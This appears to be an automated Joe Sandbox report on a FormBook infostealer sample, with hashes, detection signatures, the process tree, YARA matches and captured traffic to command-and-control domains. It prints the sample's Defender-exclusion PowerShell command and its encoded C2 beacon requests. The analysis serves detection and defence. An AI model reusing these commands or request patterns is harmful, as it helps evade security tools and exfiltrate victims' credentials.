Windows Analysis Report
NU1aAbSmCr.exe

Overview

General Information

Sample name: NU1aAbSmCr.exe (renamed because original name is a hash value)
Original sample name: ee229e0094d512a8a9e8210e75ca4319384360113b541aa7a10ed301e0425830.exe
Analysis ID: 1529867
MD5: 519b9a9e52aa6e23736f01afa4001654
SHA1: dd28761acf65483cf2de998e93b9490afb27f196
SHA256: ee229e0094d512a8a9e8210e75ca4319384360113b541aa7a10ed301e0425830
Tags: exe, user-adrian__luca
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • NU1aAbSmCr.exe (PID: 4220 cmdline: "C:\Users\user\Desktop\NU1aAbSmCr.exe" MD5: 519B9A9E52AA6E23736F01AFA4001654)
    • powershell.exe (PID: 5268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7304 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • NU1aAbSmCr.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\NU1aAbSmCr.exe" MD5: 519B9A9E52AA6E23736F01AFA4001654)
      • mCFHCvdrqdDiDT.exe (PID: 6888 cmdline: "C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • NETSTAT.EXE (PID: 7788 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)
          • mCFHCvdrqdDiDT.exe (PID: 6280 cmdline: "C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7984 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2c230:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x49df3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x31f02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2f6a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x177b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2e8a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x169b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NU1aAbSmCr.exe", ParentImage: C:\Users\user\Desktop\NU1aAbSmCr.exe, ParentProcessId: 4220, ParentProcessName: NU1aAbSmCr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", ProcessId: 5268, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NU1aAbSmCr.exe", ParentImage: C:\Users\user\Desktop\NU1aAbSmCr.exe, ParentProcessId: 4220, ParentProcessName: NU1aAbSmCr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", ProcessId: 5268, ProcessName: powershell.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NU1aAbSmCr.exe", ParentImage: C:\Users\user\Desktop\NU1aAbSmCr.exe, ParentProcessId: 4220, ParentProcessName: NU1aAbSmCr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", ProcessId: 5268, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: NU1aAbSmCr.exe, ReversingLabs: Detection: 65%
Source: Yara match, File source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: NU1aAbSmCr.exe, Joe Sandbox ML: detected
Source: NU1aAbSmCr.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: NU1aAbSmCr.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: tTOn.pdbSHA256, source: NU1aAbSmCr.exe
Source: Binary string: netstat.pdbGCTL, source: NU1aAbSmCr.exe, 00000004.00000002.1821360439.0000000001157000.00000004.00000020.00020000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000002.2579923948.0000000001227000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netstat.pdb, source: NU1aAbSmCr.exe, 00000004.00000002.1821360439.0000000001157000.00000004.00000020.00020000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000002.2579923948.0000000001227000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb, source: mCFHCvdrqdDiDT.exe, 0000000A.00000002.2578656019.000000000005E000.00000002.00000001.01000000.0000000C.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000000.1887553135.000000000005E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP, source: NU1aAbSmCr.exe, 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.1821240093.0000000003553000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.1823573799.000000000370C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb, source: NU1aAbSmCr.exe, NU1aAbSmCr.exe, 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000B.00000003.1821240093.0000000003553000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.1823573799.000000000370C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tTOn.pdb, source: NU1aAbSmCr.exe
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 11_2_0305C780 FindFirstFileW,FindNextFileW,FindClose, 11_2_0305C780
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then xor eax, eax, 11_2_03049B80
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then mov ebx, 00000004h, 11_2_037104E8

Networking

Source: DNS query: www.030002304.xyz
Source: DNS query: www.tophm.xyz
Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: Joe Sandbox View, IP Address: 65.21.196.90
Source: Joe Sandbox View, IP Address: 199.192.21.169
Source: Joe Sandbox View, ASN Name: CP-ASDE
Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected:
    GET /koup/?wZBh=UzoT8ph&8T2hn=zjgQ1IglZSD3j4X7Mb/L9VMKC/lioNLyTiYpIFDypb2XxqZYhzfHyCasu3J1FKt+ikpO665Ej+Wn9KB3IEhbZRsyBSNLju/tAMuqMeNka3iE/L9xhA== HTTP/1.1
    Host: www.kovallo.cloud
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic, HTTP traffic detected:
    GET /6uay/?8T2hn=4t2O3O+pZmQg6Me57d3wJo6heDIGdjpowWW3Ki6AModP/Z3yDnI8KOs9thhsa1jg844M9/RLYM/vwhOiRdypu3qnYIwYUCnWcXg0sNwBl87ACBA0Bg==&wZBh=UzoT8ph HTTP/1.1
    Host: www.030002304.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic, HTTP traffic detected:
    GET /igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jeths6OaqB6aU1oO66EyRWu95qtLC+XaCQo95JR9SCocHD8In7sYhzsBDy4zub0g2aDA== HTTP/1.1
    Host: www.newdaydawning.net
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic, HTTP traffic detected:
    GET /fhdl/?8T2hn=LZaialQPeltHsffZ/7p0gpt1IPXssyuTEG6qh16Ey8GBHHnvE/VN849lTokelyHAfcJ0dO++uyhAerPT/GlJwSRZaBuTZ4zvU4RSMcEjcessmo3sdA==&wZBh=UzoT8ph HTTP/1.1
    Host: www.coffee-and-blends.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic, HTTP traffic detected:
    GET /30rz/?wZBh=UzoT8ph&8T2hn=wd7m4mq4h41P+rN28pyT+ttY7GHVuAvuqtpnERraqOjaWWvMpBvRQDu/0Ra1ptpTEf0KGGfWsjsqje2uOEmu4OBI5eYxRB5JEme+Ix16OOjxqM3SMw== HTTP/1.1
    Host: www.tophm.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic, DNS traffic detected: DNS query: www.kovallo.cloud
Source: global traffic, DNS traffic detected: DNS query: www.030002304.xyz
Source: global traffic, DNS traffic detected: DNS query: www.newdaydawning.net
Source: global traffic, DNS traffic detected: DNS query: www.coffee-and-blends.info
Source: global traffic, DNS traffic detected: DNS query: www.tophm.xyz
Source: unknown, HTTP traffic detected:
    POST /6uay/ HTTP/1.1
    Host: www.030002304.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    Origin: http://www.030002304.xyz
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Content-Length: 194
    Cache-Control: no-cache
    Referer: http://www.030002304.xyz/6uay/
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
    Data Ascii: 8T2hn=1veu06OtMkxu9t/Z5NSIGISUfAQRQQFii0OwDxeKDuI6z73KNlIYIcE76wFNQAbZ6NdFg8ZwXcb+7zGnQb3po2+QSaVLTD3BZ0oOvdoBwt3gJAsXc1+a7MvYkRzg2Hjng7V7H/ADs3PwF1d7Hbx9SJ7QmNrLGI72nb4yOXP/eYnAJgShphwAHn94J+1c
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 09 Oct 2024 12:02:00 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 796
    date: Wed, 09 Oct 2024 12:02:16 GMT
    vary: User-Agent
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 796
    date: Wed, 09 Oct 2024 12:02:18 GMT
    vary: User-Agent
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 796
    date: Wed, 09 Oct 2024 12:02:21 GMT
    vary: User-Agent
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 796
    date: Wed, 09 Oct 2024 12:02:23 GMT
    vary: User-Agent
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Wed, 09 Oct 2024 12:02:32 GMT
    Server: Apache
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"
    Connection: close
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
    Data Ascii: 16<!doctype html><html 2dlang="en-US" prefix="og: https://ogp.me/ns#" 51><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:02:34 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 09 Oct 2024 12:02:43 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data 
Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 09 Oct 2024 12:02:46 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 